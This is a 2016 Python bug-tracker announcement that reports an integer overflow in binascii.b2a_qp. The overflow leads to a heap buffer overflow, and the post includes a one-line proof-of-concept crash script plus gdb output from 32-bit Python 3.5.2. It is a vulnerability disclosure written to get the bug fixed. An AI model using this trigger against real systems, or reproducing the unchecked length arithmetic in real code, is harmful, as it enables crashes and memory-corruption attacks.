[New-bugs-announce] [issue27760] integer overflow in binascii.b2a_qp
Benjamin Peterson
report at bugs.python.org
Sat Aug 13 21:32:26 EDT 2016
New submission from Benjamin Peterson:
Thomas E Hybel reports:
This vulnerability resides in /Modules/binascii.c in the function
binascii_b2a_qp_impl. The problem is that the integer variable "odatalen" can
overflow to become a small number.
The function binascii_b2a_qp_impl qp-encodes binary data. First it computes the
output string's length in the variable "odatalen":
/* First, scan to see how many characters need to be encoded */
in = 0;
while (in < datalen) {
if ((databuf[in] > 126) || ... )
{
...
odatalen += 3;
in++;
}
...
}
As we can see, each input character can result in more than three
output-characters. Then we allocate the output string:
odata = (unsigned char *) PyMem_Malloc(odatalen);
And finally we encode the input-string and write the result into odata.
If our string is so large that "odatalen" will wrap around and become a small
number, then the odata buffer will be too small to hold the data. Our input is
then copied into this too-small buffer. So the integer overflow results in a
heap buffer overflow.
Here's a proof-of-concept script:
--- begin script ---
import binascii
binascii.b2a_qp(b"\x80"*0x531dec0e) # this number gives odatalen=2
--- end script ---
Note that this script assumes a 32-bit system where the "odatalen" variable will
be 4 bytes wide. When run on Python-3.5.2, 32-bits, we get a segfault:
(gdb) r ../poc3.py
Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.py
Breakpoint 1, binascii_b2a_qp_impl (module=module at entry=0xb7c370f4,
data=data at entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1448
1448 odata = (unsigned char *) PyMem_Malloc(odatalen);
(gdb) p odatalen
$27 = 0x2
(gdb) p datalen
$28 = 0x531dec0e
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xb7fd1f63 in to_hex (ch=0x80, s=s at entry=0x83c5fff "")
at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
1333 s[1] = "0123456789ABCDEF"[uvalue % 16];
(gdb) bt
#0 0xb7fd1f63 in to_hex (ch=0x80, s=s at entry=0x83c5fff "")
at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333
#1 0xb7fd22fa in binascii_b2a_qp_impl (module=module at entry=0xb7c370f4,
data=data at entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)
at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476
#2 0xb7fd2510 in binascii_b2a_qp (module=module at entry=0xb7c370f4,
args=args at entry=0xb7cbbb5c, kwargs=kwargs at entry=0x0)
at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510
#3 0x080e0ef4 in PyCFunction_Call (func=func at entry=0xb7c37534,
args=args at entry=0xb7cbbb5c, kwds=kwds at entry=0x0)
at Objects/methodobject.c:98
----------
components: Library (Lib)
messages: 272634
nosy: benjamin.peterson
priority: normal
severity: normal
status: open
title: integer overflow in binascii.b2a_qp
type: security
versions: Python 2.7, Python 3.2, Python 3.3, Python 3.4, Python 3.5, Python 3.6
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue27760>
_______________________________________
More information about the New-bugs-announce
mailing list